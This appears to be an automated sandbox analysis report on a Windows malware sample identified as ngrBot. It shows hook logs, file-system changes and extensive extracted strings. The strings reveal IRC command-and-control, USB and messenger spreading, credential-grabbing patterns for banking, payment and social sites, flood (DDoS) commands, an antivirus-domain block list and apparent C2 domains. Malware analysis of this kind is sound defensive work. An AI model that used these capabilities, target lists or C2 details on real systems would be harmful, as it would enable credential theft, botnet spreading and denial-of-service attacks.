8 8$8(8,8084888<8@8D8H8L8P8T8X88`8d8h8l8p8t8x8|8
8 9,989D9P99h9x9|9
: :(:,:0:8:<:@:X:`:d:h:l:p:x:|:
; ;$;(;,;0;8;<;@;D;H;P;T;X;;`;h;l;p;t;x;
< <(<,<0<4<8<@<D<H<L<P<X<<`<d<h<p<t<|<
=(=0=8=@=H=T==d=l=

Unicode Strings:
---------------------------------------------------------------------------
Ajjj
jjjj
jjjj
jjjj
$jjj
Ajjj
DBWIN
.pipe
kernel32.dll
ntdll.dll
Internet Exploreriexplore.exe
autorun.inf
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
flock.ex
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
HKCU
HKLM
Microsoft Unified Security Protocol Provider
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
l"%s" %S
POST
.exe
lol.exe
n127.0.0.1
%s:Zone.Identifier
wininet.dll
secur32.dll
ws2_32.dll
:%S%SDesktop.ini
winlogon.exe
explorer.exe
Aadvapi32.dll
urlmon.dll
nspr4.dll
dnsapi.dll
Akernel23.dll
y%s%s.exe
lsass.exe
Shell
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

31upjmrlzz.exe

Processes:
PID    ParentPID    User    Path    
--------------------------------------------------
768    1176        C:Documents and SettingsMes documents31upjmrlzz.exe    

Ports:
Port    PID    Type    Path    
--------------------------------------------------

Explorer Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

IE Dlls:
DLL Path    Company Name    File Description    
--------------------------------------------------
No changes Found            

Loaded Drivers:
Driver File    Company Name    Description    
--------------------------------------------------

Monitored RegKeys
Registry Key    Value    
--------------------------------------------------

Kernel31 Api Log
    
--------------------------------------------------
***** Installing Hooks *****    
719f74df     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinSock2Parameters)    
719f80c4     RegOpenKeyExA (Protocol_Catalog9)    
719f777e     RegOpenKeyExA (00000095)    
719f764d     RegOpenKeyExA (Catalog_Entries)    
719f7cea     RegOpenKeyExA (000000000001)    
719f7cea     RegOpenKeyExA (000000000002)    
719f7cea     RegOpenKeyExA (000000000003)    
719f7cea     RegOpenKeyExA (000000000004)    
719f7cea     RegOpenKeyExA (000000000005)    
719f7cea     RegOpenKeyExA (000000000006)    
719f7cea     RegOpenKeyExA (000000000007)    
719f7cea     RegOpenKeyExA (000000000008)    
719f7cea     RegOpenKeyExA (000000000009)    
719f7cea     RegOpenKeyExA (000000000010)    
719f7cea     RegOpenKeyExA (000000000011)    
719f7cea     RegOpenKeyExA (000000000012)    
719f7cea     RegOpenKeyExA (000000000013)    
719f7cea     RegOpenKeyExA (000000000014)    
719f7cea     RegOpenKeyExA (000000000015)    
719f7cea     RegOpenKeyExA (000000000016)    
719f7cea     RegOpenKeyExA (000000000017)    
719f7cea     RegOpenKeyExA (000000000018)    
719f7cea     RegOpenKeyExA (000000000019)    
719f2623     WaitForSingleObject(77c,0)    
719f87c6     RegOpenKeyExA (NameSpace_Catalog5)    
719f777e     RegOpenKeyExA (00000039)    
719f835b     RegOpenKeyExA (Catalog_Entries)    
719f84ef     RegOpenKeyExA (000000000001)    
719f84ef     RegOpenKeyExA (000000000002)    
719f84ef     RegOpenKeyExA (000000000003)    
719f84ef     RegOpenKeyExA (000000000004)    
719f2623     WaitForSingleObject(774,0)    
719e1af2     RegOpenKeyExA (HKLMSystemCurrentControlSetServicesWinsock2Parameters)    
719e198e     GlobalAlloc()    
7c80b72f     ExitThread()    
7d2454bb     LoadLibraryA(KERNEL32.DLL)=7c800000    
7d2454bb     LoadLibraryA(MSVBVM60.DLL )=73370000    
73371c38     GetCommandLineA()    
73372f57     CreateMutex((null))    
7d23eab5     WaitForSingleObject(764,7530)    
410df8     LoadLibraryA(KERNEL32.DLL)=7c800000    
410df8     LoadLibraryA(MSVBVM60.DLL )=73370000    
733739f4     GetCommandLineA()    
7338d1b3     LoadLibraryA(C:WINDOWSsystem32VB6FR.DLL)=0    
7337452c     GetVersionExA()    
7337476c     LoadLibraryA(OLEAUT32.DLL)=770e0000    
772370b9     GetVersionExA()    
7723711c     GetCommandLineA()    
7337476c     LoadLibraryA(SXS.DLL)=77210000    
774efa66     LoadLibraryA(oleaut32.dll)=770e0000    
73376792     RegOpenKeyA (HKLMSOFTWAREMicrosoftVBAMonitors)    
77daeff6     RegOpenKeyExA (HKLMSOFTWAREMicrosoftVBAMonitors)    
770fc957     LoadLibraryA(C:WINDOWSsystem32kernel32.dll)=7c800000    
7337a15b     LoadLibraryA(kernel32.dll)=7c800000    
406f1e     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(kernel32)=7c800000    
7337a15b     LoadLibraryA(USER32)=7e390000    
7345d09c     CreateFileA(C:Documents and SettingsMes documents31upjmrlzz.exe)    
7345d34f     ReadFile()    
406f1e     LoadLibraryA(NTDLL)=7c910000    
7c8165b3     WaitForSingleObject(74c,64)    
7c8191f8     LoadLibraryA(advapi32.dll)=77da0000    
7337a4c5     GetCurrentProcessId()=1176    
7337bdfa     RegOpenKeyExA (HKLMSoftwareMicrosoftWindows)    
7337be1c     RegOpenKeyExA (HTML Help)    
7337be1c     RegOpenKeyExA (Help)    
7337c9ce     WaitForSingleObject(7e4,ffffffff)    
73373657     ExitProcess()    
***** Injected Process Terminated *****    

DirwatchData
    
--------------------------------------------------
WatchDir Initilized OK    
Watching C:DOCUME~1LOCALS~1Temp    
Watching C:WINDOWS    
Watching C:Program Files    
Created: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf    
Modifed: C:WINDOWSPrefetch31UPJMRLZZ.EXE-1EE360EA.pf    
Created: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp    
Created: C:DOCUME~1zezakLOCALS~1TempJET37.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET37.tmp    
Deteled: C:DOCUME~1zezakLOCALS~1TempJET49CB.tmp    
File: 31upjmrlzz.exe
Size: 116236 Bytes
MD5: 9702091B21C1A48955A5268D07E31EF6
Packer: File not found C:iDEFENSESysAnalyzerpeid.exe

File Properties: CompanyName      
FileDescription  
FileVersion      
InternalName     
LegalCopyright   
OriginalFilename 
ProductName      
ProductVersion   

Exploit Signatures:
---------------------------------------------------------------------------
Scanning for 19 signatures
Scan Complete: 312Kb in 0,032 seconds
Urls
--------------------------------------------------
http://%s/%s
http://%s/
http://
http://api.wipmania.com/ftp://%s:%s@%s:%d

RegKeys
--------------------------------------------------
gdatasoftware.
sunbeltsoftware.
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionRun
SoftwareMicrosoftWindowsCurrentVersionPoliciesSystem
.DEFAULTSoftwareMicrosoftWindowsCurrentVersionRun

ExeRefs
--------------------------------------------------
File: 31upjmrlzz_dmp.exe_
.exe
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
%0x.exe
Internet Exploreriexplore.exe
pidgin.exe
wlcomm.exe
msnmsgr.exe
msmsgs.exe
opera.exe
chrome.exe
ieuser.exe
iexplore.exe
firefox.exe
.ipconfig.exe
verclsid.exe
regedit.exe
rundll32.exe
cmd.exe
regsvr32.exe
.exe
lol.exe
winlogon.exe
explorer.exe
y%s%s.exe
lsass.exe

Raw Strings:
--------------------------------------------------
File: 31upjmrlzz_dmp.exe_
MD5:  42157d0a769f0335830e4646c6a00338
Size: 319490

Ascii Strings:
---------------------------------------------------------------------------
!This program cannot be run in DOS mode.
Rich:
.text
`.rdata
@.data
.reloc
WPVS
t1h(
_[^]
QRPWV
RPQWV
QRPSV
txVhD
uaVhD
QRPSV
SVW3
u3h0
u!h(
u3h0
PQRV
RPQW
u:WhD
u#WhD
QRPW
RPQV
RPQV
PQRV
RPQW
RSSh
vG9u
t0WSV
WVRj
WSPQR
vt9u
t0WSV
WVRj
WSPQR
gfff
WVRj
PWQR
u3h0
u!h(
u3h0
>CAL 
uGh4
=MSG t
=SDG 
>MSG u`
SVW3
SVW3
9:vP
G;9r
@W;F
Wj h
t&j,j
Wjdj
F4VP
SWf9
t-f;
t=hH
_^[]
=pzC
|04+~4
_^[]
SVWP3
QWSVR
=lzC
QPRWS
RPQS
WQRV
_^[]
_^[]
un9F
t2j h
L9_@vI
;_@r
WVPQR
SQRj
STFU
=pzC
A8j@
QWRPV
B0QPV
=4yA
PQRj
PQRj
SVWh
STFU
Vh@P@
L9^8vE
;^8r
=pzC
hpP@
STFU
PL9^(v^
9+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
+=pzC
;^(r
9~0v/
;~0r
9^8v;
:+=pzC
+=pzC
+=pzC
;^8r
9^@v2
:+=pzC
+=pzC
+=pzC
;^@r
tu9]
RVWPQ
uXWV
QVWRP
u$WP
E$_^[
tpVW
uTVW
E$_^[
E$^[
E$_^[
j&hx
t}hP
QVWh
95hVA
QVht
8POST
tWWV
PQWj
RPQVW
RPQVW
WVRPS
u h(
QWRS
SVWh
SVW3
95PWA
;5PWA
95PWA
;5PWA
VWQh4
t"j V
SVWh
=USERt
=PASS
:Uu#Vh
8Pu.
=FEATt
=TYPEt
=PASVu
=STATt
=LISTu
uuhh
ucWVh
RPQh
PQRh
QRPh
QVh:
Rh~f
_[^]
_[^]
F/PQ
~(WR
T0(RW
t=VW
Qh~f
u4SV
W$RP
tmQh
RSSh
t,PVQ
O,@PQ
TSVW3
WWWWh
F4RP
LSVW3
^<^[
V4QR
vJ9^,u
;F8v
N4PQ
F4RP
F@@PR
F,BRP
u-SSV
RSWWj
8httpu1
u$8H
QRVP
RVPQ
QRVP
RVPQ
=|[A
Qh~f
SVWP
=|[A
Rh~f
hh)A
h`)A
=|[A
tlWP
=|[A
tlWP
=|[A
Rh~f
=|[A
=|[A
_^[]
h0^A
hh^A
SVWj
_^Yj
QPPPPh
h(*A
SVWj,
VjP
[@^]
Vj.P
[@^]
QRRj
RRRRf
[_^]
SVWh
h0*A
*t2:
VhH*A
Qh4*A
QSV3
j PhxWA
h`*A
Vj#S
_^[]
Wj*P
^[_]
h0+A
h$+A
SVWh
VVVV
WWVS
SVW3
RVh-
@PVj
PVh-
VhH+A
SVW3
@PVj
RVj"W
hT+A
hT+A
h|+A
ht+A
Rhh+A
QhX+A
@PVR
Wj j+V
<%u2
VVVV
SVWh
QRPu
PQRu
h ,A
QRhL]A
PhTA
Ph$]A
9Q@w
RRhh
h`]A
h`]A
h`]A
h`]A
Ph0]A
8nu8h
Rh0]A
Qh0]A
Rh0]A
Ph@]A
8nu8h
Rh@]A
Qh@]A
Rh@]A
htXA
h@XA
PVRQhT`A
PQRVh
RQPhT`A
PQRSh
8_^[
hPXA
hXA
hHXA
Rh0]A
Rh0]A
Rh@]A
Qh@]A
h|,A
h|,A
hx,A
QhP_A
Qh|_A
hx,A
h(XA
hp,A
hd,A
h8XA
8httpuM
8:uE
u>8P
PhD,A
$_^[
Qh@`A
 _^[
h@,A
h(`A
h|bA
QRPh4,A
h`XA
h4XA
hXXA
hpXA
QRPh4,A
hhXA
RPQh4,A
SVWh
8#t"
RVWP
SVWR
hx,A
hx,A
hx]A
Qhl]A
PQh0]A
u(hl
Ph$]A
QRh0]A
SVW3
h -A
t"h<-A
t"h0-A
u5h(-A
Vh$cA
VhDcA
VhdcA
VhpcA
t)h0u
SVW3
RPhD-A
QRPh
QRPh
PQRhTaA
PQhDbA
PRh(aA
QRPh
SVW3
tRh|,A
uBPh
h`]A
h -A
PWQRh
SPQh
PSRhTaA
PhTaA
PRhDbA
Ph(aA
hx,A
tqCh
s[h5
ht.A
SWhl.A
hd.A
t'j j
h<.A
h46A
SVWh
hx,A
Rh$6A
h/A
h/A
tb@Ph
Rhd/A
;< t
SVW3
Wh00A
h 0A
5$iA
50iA
5<iA
5HiA
5TiA
5`iA
5liA
95$iA
6 iA
taVW
h@0A
hD0A
Ph<_A
|Sj 3
tlSSSSSSSSSShL0A
Phd0A
tU< u
u2Wh
h(3A
hT+A
hT+A
SVWh
hT+A
h,3A
u.h,3A
SVWh
RhP3A
PVQR
h@3A
;SDG 
8SDG 
h,3A
Qhx3A
RPhl3A
QRhT3A
t!WV
_^[]
hl.A
hd.A
hl.A
hd.A
h(mA
h(5A
t!h85A
_^t)
9|:~
:~+w:~
tK@boL@
L@iBK@
%s.%s
pdef
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
block
bdns
CreateFileW
0123456789ABCDEF
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
msnmsg
msnint
baddr
X-MMS-IM-Format:
CAL %d %256s
msnu
Done frst
ngr->blocksize: %d
block_size: %d
NtFreeVirtualMemory
NtAllocateVirtualMemory
NtQuerySystemInformation
LdrEnumerateLoadedModules
NtQueryInformationProcess
LdrGetProcedureAddress
NtQueryVirtualMemory
LdrLoadDll
NtQueryInformationThread
LdrGetDllHandle
RtlAnsiStringToUnicodeString
.pipe%s
kernel32.dll
GetNativeSystemInfo
%s_%d
%s_0
%s-Mutex
SeDebugPrivilege
ntdll.dll
NtGetNextProcess
%s-pid
%s-comm
NtResumeThread
PONG 
JOIN #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
.exe
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %255s
JOIN %255s
PRIVMSG
JOIN
%s:%d
NtSetInformationProcess
%s.%s%s
%S%s%s
HKCU
HKLM
%s.%S%S
%S%S%S
state_%s
%s.%s (p='%S')
pop3://%s:%s@%s:%d
popgrab
%s:%s@%s:%d
anonymous
ftp://%s:%s@%s:%d
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
Directadmin
WHCMS
cPanel
blog
%s-%s-%s
ffgrab
iegrab
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
fortinet.
virusbuster.nprotect.
gdatasoftware.
virus.
precisesecurity.
lavasoft.
heck.tc
emsisoft.
onlinemalwarescanner.
onecare.live.
f-secure.
bullguard.
clamav.
pandasecurity.
sophos.
malwarebytes.
sunbeltsoftware.
norton.
norman.
mcafee.
symantec
comodo.
avast.
avira.
avg.
bitdefender.
eset.
kaspersky.
trendmicro.
iseclab.
virscan.
garyshood.
viruschief.
jotti.
threatexpert.
novirusthanks.
virustotal.
login[password]
login[username]
*members*.iknowthatgirl*/members*
IKnowThatGirl
*youporn.*/login*
YouPorn
*members.brazzers.com*
Brazzers
clave
numeroTarjeta
*clave=*
*bcointernacional*login*
Bcointernacional
*:2222/CMD_LOGIN*
*whcms*dologin*
*:2086/login*
*:2083/login*
*:2082/login*
*webnames.ru/*user_login*
Webnames
*dotster.com/*login*
Dotster
loginid
*enom.com/login*
Enom
login.Pass
login.User
*login.Pass=*
*1and1.com/xml/config*
1and1
token
*moniker.com/*Login*
Moniker
LoginPassword
LoginUserName
*LoginPassword=*
*namecheap.com/*login*
Namecheap
loginname
*godaddy.com/login*
Godaddy
Password
EmailName
*Password=*
*alertpay.com/login*
Alertpay
*netflix.com/*ogin*
Netflix
*thepiratebay.org/login*
Thepiratebay
*torrentleech.org/*login*
Torrentleech
*vip-file.com/*/signin-do*
Vip-file
*pas=*
*sms4file.com/*/signin-do*
Sms4file
*letitbit.net*
Letitbit
*what.cd/login*
Whatcd
*oron.com/login*
Oron
*filesonic.com/*login*
Filesonic
*speedyshare.com/login*
Speedyshare
*pw=*
*uploaded.to/*login*
Uploaded
*uploading.com/*login*
Uploading
loginUserPassword
loginUserName
*loginUserPassword=*
*fileserv.com/login*
Fileserve
*hotfile.com/login*
Hotfile
*4shared.com/login*
4shared
txtpass
txtuser
*txtpass=*
*netload.in/index*
Netload
*freakshare.com/login*
Freakshare
login_pass
*login_pass=*
*mediafire.com/*login*
Mediafire
*sendspace.com/login*
Sendspace
*megaupload.*/*login*
Megaupload
*depositfiles.*/*/login*
Depositfiles
userid
*signin.ebay*SignIn
eBay
*officebanking.cl/*login.asp*
OfficeBanking
*secure.logmein.*/*logincheck*
LogMeIn
session[password]
session[username_or_email]
*password]=*
*twitter.com/sessions
Twitter
txtPassword
txtEmail
*&txtPassword=*
*.moneybookers.*/*login.pl
Moneybookers
*runescape*/*weblogin*
Runescape
*dyndns*/account*
DynDNS
*&password=*
*no-ip*/login*
NoIP
*steampowered*/login*
Steam
quick_password
quick_username
username
*hackforums.*/member.php
Hackforums
email
*facebook.*/login.php*
Facebook
*login.yahoo.*/*login*
Yahoo
passwd
login
*passwd=*
*login.live.*/*post.srf*
Live
TextfieldPassword
TextfieldEmail
*TextfieldPassword=*
*gmx.*/*FormLogin*
*Passwd=*
Gmail
FLN-Password
FLN-UserName
*FLN-Password=*
*fastmail.*/mail/*
Fastmail
pass
user
*pass=*
*bigstring.*/*index.php*
BigString
screenname
*screenname.aol.*/login.psp*
password
loginId
*password=*
*aol.*/*login.psp*
Passwd
Email
*service=youtube*
*google.*/*ServiceLoginAuth*
YouTube
login_password
login_email
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
PayPal
%s / ?%d HTTP/1.1
Host: %s
User-Agent: %s
Keep-Alive: 300
Connection: keep-alive
Content-Length: 42
POST
Mozilla/4.0
Connection: Close
X-a: b
.PHYSICALDRIVE0
00100
SeShutdownPrivilege
NtShutdownSystem
This binary is invalid.
Main reasons:
- you stupid cracker
- you stupid cracker...
- you stupid cracker?!
ngrBot Error
shell32.dll
http
httpi
usbi
dnsapi.dll
DnsFlushResolverCache
http://%s/%s
http://%s/
HTTP
Host: 
POST /%1023s
{%s|%s%s}%s
n%s{%s|%s%s}%s
<br>
admin
isadmin
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
disabled
enabled
%s|%s
[Logins]: Cleared %d logins
#user
#admin
#new
removing
exiting
reconnecting
MOTD
bsod
disable
POP3 -> 
FTP -> 
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
dlds
http://
rebooting
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
SoftwareMicrosoftWindowsCurrentVersionRun
ngrBot
running
IPC_Check
shellopencommand=
shellexplorecommand=
icon=shell32.dll,7
useautoplay=1
action=Open folder to view files
shellexecute=
[autorun]
.lnk
%windir%system32cmd.exe
&&%%windir%%explorer.exe %%cd%%%s
/c "start %%cd%%RECYCLER%s
RECYCLER
.inf
%s%s
.%c:
%s%s
%sautorun.tmp
%sautorun.inf
%c:
gdkWindowToplevelClass
%0x.exe
comment-text
*bebo.*/c/home/ajax_post_lifestream_comment
bebo Lifestream
*bebo.*/c/profile/comment_post.json
bebo Comment
Message
*bebo.*/mail/MailCompose.jsp*
bebo Message
*friendster.*/sendmessage.php*
Friendster Message
comment
Friendster Comment
shoutout
*friendster.*/rpc.php
Friendster Shoutout
*vkontakte.ru/mail.php
vkontakte Message
*vkontakte.ru/wall.php
vkontakte Wall
message
*vkontakte.ru/api.php
vkontakte Chat
text
*twitter.*/*direct_messages/new*
Twitter Message
*twitter.*/*status*/update*
Twitter Tweet
status
*facebook.*/ajax/*MessageComposerEndpoint.php*
Facebook Message
msg_text
*facebook.*/ajax/chat/send.php*
Facebook IM
-_.!~*'()
Content-Length: 
%s.%s hijacked!
MSG %d %s %d
MSG %d %1s
SDG %d %d
Reliability: 
From: 
Content-Length: %d
X-MMS-IM-Format: 
SDG %d
bmsn
%s_0x%08X
RegCreateKeyExW
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileA
PR_Write
DnsQuery_W
DnsQuery_A
InternetWriteFile
HttpSendRequestW
HttpSendRequestA
GetAddrInfoW
send
CreateFileA
MoveFileW
MoveFileA
DeleteFileW
DeleteFileA
CopyFileW
CopyFileA
NtQueryDirectoryFile
NtEnumerateValueKey
%08x
OPEN
DnsFree
DnsQuery_A
DNSAPI.dll
FreeContextBuffer
InitializeSecurityContextW
FreeCredentialsHandle
DeleteSecurityContext
QueryContextAttributesW
AcquireCredentialsHandleW
EncryptMessage
DecryptMessage
InitializeSecurityContextA
ApplyControlToken
Secur32.dll
SHGetSpecialFolderPathW
SHGetFileInfoA
ShellExecuteA
SHELL32.dll
InternetCloseHandle
InternetReadFile
InternetQueryDataAvailable
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
HttpQueryInfoW
InternetQueryOptionW
WININET
.dll
PathAppendW
StrStrIA
PathAppendA
PathFindExtensionA
SHLWAPI.dll
WS2_32.dll
memset
wcsstr
strstr
wcsrchr
??3@YAXPAX@Z
atoi
sscanf
_strcmpi
printf
_snprintf
sprintf
strncpy
_memicmp
_wcsnicmp
_vsnprintf
_stricmp
strtok
strchr
_snwprintf
??2@YAPAXI@Z
_strnicmp
isxdigit
memmove
strncmp
toupper
strrchr
vsprintf
isalnum
strncat
MSVCRT.dll
lstrcpyA
MoveFileExA
lstrcmpA
WideCharToMultiByte
MoveFileExW
lstrcmpW
ExitThread
MultiByteToWideChar
GetFileAttributesA
SetFileAttributesW
GetFileAttributesW
LoadLibraryW
CloseHandle
SetFileTime
CreateFileW
GetFileTime
GetSystemTimeAsFileTime
WriteFile
GetModuleHandleW
GetLastError
ReadFile
GetTickCount
HeapAlloc
GetProcessHeap
HeapFree
lstrlenA
Sleep
WriteProcessMemory
ReadProcessMemory
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
HeapReAlloc
SetEvent
ConnectNamedPipe
CreateNamedPipeA
CreateEventA
DisconnectNamedPipe
GetOverlappedResult
WaitForMultipleObjects
CreateFileA
VirtualFreeEx
VirtualAllocEx
IsWow64Process
CreateRemoteThread
OpenProcess
WaitForSingleObject
ReleaseMutex
MapViewOfFile
OpenFileMappingA
CreateFileMappingA
InterlockedIncrement
UnmapViewOfFile
CreateMutexA
GetVersionExA
GetModuleFileNameW
InterlockedCompareExchange
CreateThread
GetWindowsDirectoryW
DeleteFileW
GetTempFileNameW
lstrcatW
lstrcpynW
DeleteFileA
SetFileAttributesA
lstrcpyW
LocalFree
LocalAlloc
lstrcpynA
SetFilePointer
DeviceIoControl
VirtualAlloc
CreateProcessW
ExitProcess
lstrcatA
GetVolumeInformationW
GetLocaleInfoA
FlushFileBuffers
CopyFileW
FindClose
FindNextFileA
FindFirstFileA
SetCurrentDirectoryA
LockFile
GetFileSize
CreateDirectoryA
GetLogicalDriveStringsA
OpenMutexA
GetModuleFileNameA
GetWindowsDirectoryA
KERNEL32.dll
MessageBoxA
wvsprintfA
wsprintfW
DefWindowProcA
DispatchMessageA
TranslateMessage
GetMessageA
RegisterDeviceNotificationA
CreateWindowExA
RegisterClassExA
USER32.dll
CryptGetHashParam
CryptDestroyHash
CryptHashData
CryptReleaseContext
CryptCreateHash
CryptAcquireContextA
AdjustTokenPrivileges
LookupPrivilegeValueA
OpenProcessToken
RegCloseKey
RegSetValueExW
RegCreateKeyExW
RegNotifyChangeKeyValue
RegSetValueExA
RegOpenKeyExA
ADVAPI32.dll
CoCreateInstance
CoInitialize
ole32.dll
 n;^
Qkkbal
i]Wb
9a&g
MGiI
wn>Jj
#.zf
+o*7
!!!!!!!!
@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""
@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x
lalorlz1.info
ROCKR
rlz1lola.info
ROCKR
rlz01jm.info
ROCKR
#ROCK
ngrBot
ELPERRO
]1.1.0.0
CUSTOMER
FvLQ49IlzIyLjj6m
msn.set
msn.int
http.set
http.int
http.inj
mdns
stats
speed
logins
slow
ssyn
stop
F4XA
gGWHXA
5hXA
ZpXA
` WA
f0WA
u{A<WA
[@WA
PASS %s
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
NICK %s
JOIN %s %s
PART %s
PRIVMSG %s :%s
QUIT :%s
PONG %s
PING
PRIVMSG
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread inte
rval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Stopped rsock4
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[FTP Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef+]: %s
[DNS]: Blocked DNS "%s"
[MSN]: %s
[HTTP]: %s
ftplog
poplog
ftpinfect
httplogin
httptraff
ruskill
rdns
rreg
httpspread
http://api.wipmania.com/
.pipe%08x_ipc
0;0G0O0V0d0n0s0
1)13181Y1e1u1|1
2C2c2
3 363M3j3u3
6(6/686J6O6T6m6
7 7(7O7V7_7
7=8T88
9#9:9W9^9f9~9
98:R:[:
;U<e<j<p<
<g=o=
>*>N>
?%?/?6?A?P?
0<0E0L0S0c0i0t0{0
2!3-4d4n4s4
5(5:5?5D5a5x5
6 6J6a6
7&7.7>7I7N7f7
1#2_2
8"8Q8X8g8q8
9':;:Y:
<'<1<H<X<x<
=%=7=D=K=Z=w=}=
>@>R>>m>
?1?<?B?j?
0g0g1
1"2Q2~2
203N3
424>4^4
8;9~9
:K:';A;_;
<4<><T<^<h<
=*=>=D=N=l=u=
>#>)>8>>>O>Y>^>p>u>
?8?L?c?u?
0$1-1H1N1_1n1
313Y3k3
414l4
515B5P5u5
676V6_6f6v6
889Y9r9
:-:G:
;#;(;2;7;<;A;F;W;
<5<?<^<
<W=l=|=
=d>o>{>
?/?U?`?p?
1P2T2X2
3?4a4h4
5A5H5|5
7U8]8f8}8
9'9-939q9
: :%:n:
;1;J;d;
<%<3<<<B<i<v<
=$=+=0===E=L=T=o=v=
=6>E>
?%?4??
0'0K0s0x0}0
091M1g1t1
3[3q3
3*494
4-575w5~5
5B6L6
6(7I7]7z7
848_9m9w9
:+:1:7:D:Q:V:e:t:
; ;,;8;L;Q;V;n;s;x;};
;5<B<]<w<
=5===B=N=S=g=l=
5"6-6B6L6Q6c6u6
7 70767=7L7R7
94:{:
'010
1.1F1^1
2(2>2P2b2t2
4K5f5
6=6K6Y6
7*7/7L7S7r7
8]8i8
9+9;9A9G9d9q9w9}9
9/:b:h:
;!;S;`;h;s;
;E<e<w<
=.=<=A=F=L=R=k=u=
>#>,>X>
?-??y?
42484T4`4f4
4X5]5|5
6-646D6Q6[6b6g6q6z6
9 9&9<9G9R9W99q9v9
9::G:M:b:j:z:
;.;6;;;B;H;S;c;k;
<+<F<T<`<
=3=E=Q=
>3>T>k>z>
?Z?r?{?
%0<0V0h0
141>1l1
3g3r3
34c4
5*585R5w5
6!6<6R6a6
7=7C7T7g7z7
8-9L9w9
9-:D:W:
;#;4;:;T;Z;
<#<(<-<2<7<P<j<w<
=)=.=K=[=`=}=
>+>I>V>[>s>z>
?*?H?T?a?g?u?
0,0J0Z0g0l0v0
1%101=1C1I1W1s1y1
2'212<2J2_2
3"3@3P3V3
4)4J4h4x4
535Q5s5
6!6.656D6S6`6m6z6
7?7E7
7'8,818[8w8
8.9K9V9s9
:':,:D:T:Y:r:
;2;7;W;r;w;|;
<$<5<<<F<N<b<
=(=I=O=Z=r=|=
>V>g>|>
>#?h?
0-070D0x0
0@1G1
132D2Z2p2
3*343=3R3^3
3-434=4F5P5]5
536N6[6
637B7U7d7q7
818>8T8]8|8
9T9`9o9u9z9
:!:,:3:;:A:O:Y:f:l:r:
;(;3;9;?;Q;];c;i;{;
<&<3<8<G<T<Z<`<n<
<,=3=A=G=W=w=|=
>@>E>>
>W?`?
010C0H0M0a0f0k0
1 1$1<1M1U1
1-2O2z2
3I3Z3o3z3
4"4'4<4U4_4t4z4
575=5r5|5
6(6=6P6m6z6
7 767<7~7
8A8F8Y8c8j8
999C9
:%:,:3:=:F:e:
;+;=;D;X;];c;i;n;
;.<4<;<@<e<p<w<
="=*=0=;=F=O=Z=b=g=v={=
=7>N>W>]>
>&?7?~?
40;0A0Q0a0
2)2A2[2
2T3]3f5
6F6Y6t6
7I7Y7_7e7k7q7w7}7
8*808;8~8
9 9O9X9^9
